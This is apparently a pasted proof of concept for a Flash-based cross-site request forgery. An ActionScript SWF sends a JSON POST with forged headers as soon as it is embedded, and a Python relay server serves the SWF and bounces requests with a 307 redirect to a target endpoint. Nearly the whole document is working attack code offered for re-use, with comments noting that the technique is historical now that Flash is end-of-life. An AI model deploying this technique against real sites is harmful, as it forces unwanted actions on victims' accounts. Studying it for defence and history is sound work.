- package
- {
- import flash.display.Sprite;
- import flash.net.URLLoader;
- import flash.net.URLRequest;
- import flash.net.URLRequestHeader;
- import flash.net.URLRequestMethod;
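// Flash-based CSRF proof of concept.
//
// The SWF builds a JSON POST carrying attacker-chosen headers and sends it to
// the attacker's own relay server (the Python BaseHTTPServer further down in
// this paste). That relay answers with a 307 redirect to the real target, and
// the PoC relies on the Flash runtime replaying method, body and custom headers
// against the redirect target.
//
// Caveats for anyone re-using this:
//  * The technique only works on Flash Player builds that follow a 307 without
//    re-applying the redirect target's crossdomain.xml policy. Adobe reportedly
//    tightened this redirect handling in later releases, and Flash Player has
//    been end-of-life since the end of 2020, so treat this as a historical PoC
//    rather than something that will fire in a current browser.
//  * Adobe's URLRequestHeader documentation lists Referer among the headers
//    SWF content is not allowed to set; expect the runtime to reject or drop
//    that header rather than forward it. Confirm against the runtime you test.
//  * X-Requested-With is presumably set to satisfy a server-side header check;
//    note its value here is a URL rather than the usual "XMLHttpRequest", so
//    verify what the target endpoint actually compares against.
public class csrf extends Sprite
{
    // The constructor does all the work: the request is fired as soon as the
    // SWF is instantiated, so merely embedding it on a page triggers the POST.
    public function csrf()
    {
        super();

        // Body the target is expected to parse. user_id is a placeholder value.
        var payload:Object = { "user_id": 36427093 };
        var body:String = JSON.stringify(payload);

        // Attacker-controlled relay; it must be reachable from the victim's
        // browser and is what issues the 307 to the vulnerable endpoint.
        var relayUrl:String = "http://my-server:8000/";
        var request:URLRequest = new URLRequest(relayUrl);
        request.method = URLRequestMethod.POST;
        request.data = body;
        request.requestHeaders.push(new URLRequestHeader("Content-Type", "application/json;charset=utf-8"));
        request.requestHeaders.push(new URLRequestHeader("Referer", "https://some-vulnerable-endpoint"));
        request.requestHeaders.push(new URLRequestHeader("X-Requested-With", "https://some-vulnerable-endpoint"));

        var loader:URLLoader = new URLLoader();
        try
        {
            // load() may throw synchronously (for example on a disallowed
            // header). Errors are only traced, so a failing PoC is silent
            // unless you run it with a debug player.
            loader.load(request);
        }
        catch (e:Error)
        {
            trace(e);
        }
    }
}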
- }
- import BaseHTTPServer
- import time
- import sys
# Listening address for the relay. An empty host binds every interface on the
# machine, so the PoC server is reachable from the network, not just localhost;
# narrow this if you only need local testing.
HOST, PORT = '', 8000
# Target that every non-SWF request is redirected to (placeholder; replace).
vulnerable_endpoint = "https://some-vulnerable-endpoint-here"
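class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    """Attacker-side relay for the Flash 307-redirect CSRF proof of concept.

    Two jobs: serve the compiled ``csrf.swf`` when ``/csrf.swf`` is requested,
    and answer every other request with a 307 redirect to
    ``vulnerable_endpoint``. 307 (rather than 302) is used because it
    instructs the client to repeat the request with the same method and body,
    which is what lets the JSON POST sent by the SWF be replayed at the target.

    The module-level ``vulnerable_endpoint`` is read at request time.
    """

    def do_POST(self):
        if self.path == '/csrf.swf':
            # csrf.swf is the file you compiled the ActionScript above into.
            # Read it before sending any headers so a missing/unreadable file
            # yields a proper error instead of a 200 with an empty body; the
            # context manager closes the handle on every request.
            try:
                with open("csrf.swf", "rb") as swf:
                    payload = swf.read()
            except (IOError, OSError):
                self.send_error(404, "csrf.swf not found next to the server")
                return
            self.send_response(200)
            self.send_header("Content-Type", "application/x-shockwave-flash")
            self.end_headers()
            self.wfile.write(payload)
            return
        # Any other path: bounce the request (method and body preserved by the
        # client per 307 semantics) to the target endpoint.
        self.send_response(307)
        self.send_header("Location", vulnerable_endpoint)
        self.end_headers()

    def do_GET(self):
        # GET is handled exactly like POST so the SWF can be fetched by a plain
        # <embed>/<object> load; a GET to any other path is redirected as well.
        print(self.path)
        self.do_POST()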
if __name__ == '__main__':
    # Bind the relay on HOST:PORT and serve until Ctrl-C; only a keyboard
    # interrupt is swallowed, any other failure propagates as before.
    httpd = BaseHTTPServer.HTTPServer((HOST, PORT), RedirectHandler)
    sys.stdout.write("%s Server Starts - %s:%s\n" % (time.asctime(), HOST, PORT))
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    sys.stdout.write("%s Server Stops - %s:%s\n" % (time.asctime(), HOST, PORT))